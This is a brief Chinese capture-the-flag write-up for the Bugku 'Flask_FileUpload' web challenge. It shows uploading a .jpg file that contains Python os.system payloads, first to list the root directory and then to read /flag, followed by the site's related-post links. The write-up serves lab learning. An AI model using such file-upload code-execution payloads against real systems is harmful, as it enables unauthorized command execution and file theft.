Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码 
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码 
import os
os.system('cat /flag ')
相关推荐
像风一样的男人@1 分钟前
python --html转pdf/pdf分页优化
python·pdf·html
SuperEugene2 分钟前
Vue3 表格封装实战:列配置 + slot 扩展 + 请求生命周期|Vue生态精选篇
前端·javascript·vue.js·前端框架
文刀竹肃5 分钟前
Upload-Labs 第1至第10关通关教程(更新中。。。)
网络·安全·web安全·网络安全
㱘郳7 分钟前
Python开发 Django和DRF框架 推荐部分B站视频
开发语言·python·django
观书喜夜长7 分钟前
web网络安全-每日一练-Training-WWW-Robots
学习·web安全
ding_zhikai7 分钟前
【Web应用开发笔记】Django笔记8:用户账户相关功能
笔记·后端·python·django
Mr数据杨7 分钟前
【Dv3Admin】Django动态配置首页仪表盘
python·django·sqlite
小鹿软件办公9 分钟前
Firefox Nova:火狐浏览器即将迎来大规模改版
前端·firefox
cnnews10 分钟前
在AWS Lambda上部署 tokenizers
python·云计算·numpy·aws·lambda·onnxruntime·tokenizers
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03本地部署 OpenClaw + DeepSeek-R1 完全指南04OpenClaw 连接飞书完整指南:插件安装、配置与踩坑记录05OpenClaw 飞书机器人不回复消息?3 小时踩坑总结06Window 10部署openclaw报错node.exe : npm error code 12807OpenClaw macOS 完整安装与本地模型配置教程(实战版)08OpenClaw 接入 QQ Bot 完整实践指南09npm-error code 128问题解决方法10得物前端部门,没了